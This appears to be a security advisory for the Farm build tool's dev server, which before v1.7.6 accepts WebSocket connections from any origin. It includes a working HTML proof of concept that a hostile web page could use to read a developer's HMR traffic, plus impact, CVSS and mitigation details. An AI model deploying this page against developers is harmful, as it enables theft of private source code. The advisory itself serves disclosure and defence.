
Farm versions before v1.7.6 contain the following vulnerability: the dev (HMR) server does not validate the Origin of WebSocket clients that connect to it. An attacker whose web page a developer visits can therefore open a connection to the developer's local dev server, surveil the HMR traffic, and potentially steal source code that the WebSocket server leaks in its messages.

PoC

Code like this would be on the attacker's webpage:

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>WebSocket Client Example</title>
</head>
<body>
  <h1>WebSocket Client</h1>
  <div id="status">Connecting...</div>
  <div id="messages"></div>
  <script>
    // Create a new WebSocket connection to the server using the default port
    const socket = new WebSocket('ws://localhost:9000/__hmr', 'farm_hmr');
    // Connection opened
    socket.addEventListener('open', function (event) {
      document.getElementById('status').textContent = 'Connected to WebSocket server';
      // Send a message to the server
      socket.send('Hello, server!');
    });

    // Listen for messages from the server
    socket.addEventListener('message', function (event) {
      const messagesDiv = document.getElementById('messages');
      const messageElement = document.createElement('p');
      messageElement.textContent = `Server says: ${event.data}`;
      messagesDiv.appendChild(messageElement);
    });

    // Connection closed
    socket.addEventListener('close', function (event) {
      document.getElementById('status').textContent = 'Disconnected from WebSocket server';
    });

    // Handle errors
    socket.addEventListener('error', function (event) {
      document.getElementById('status').textContent = 'WebSocket error';
      console.error('WebSocket error:', event);
    });
  </script>
</body>
</html>

Save this as an HTML file, open it in a browser while the dev server is running, and edit a source file; the messages the HMR server pushes are displayed in the page.

Impact

This vulnerability can be exploited to obtain developers' source code if they end up visiting an attacker-controlled website.

CVSS v3 Score: 6.5/10 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)
Weakness: CWE-1385 (Missing Origin Validation in WebSockets)

Mitigation

Update Farm to at least v1.7.6, or refrain from visiting untrusted sites while `farm dev` is running. If neither is possible, isolate your dev environment behind a proxy.
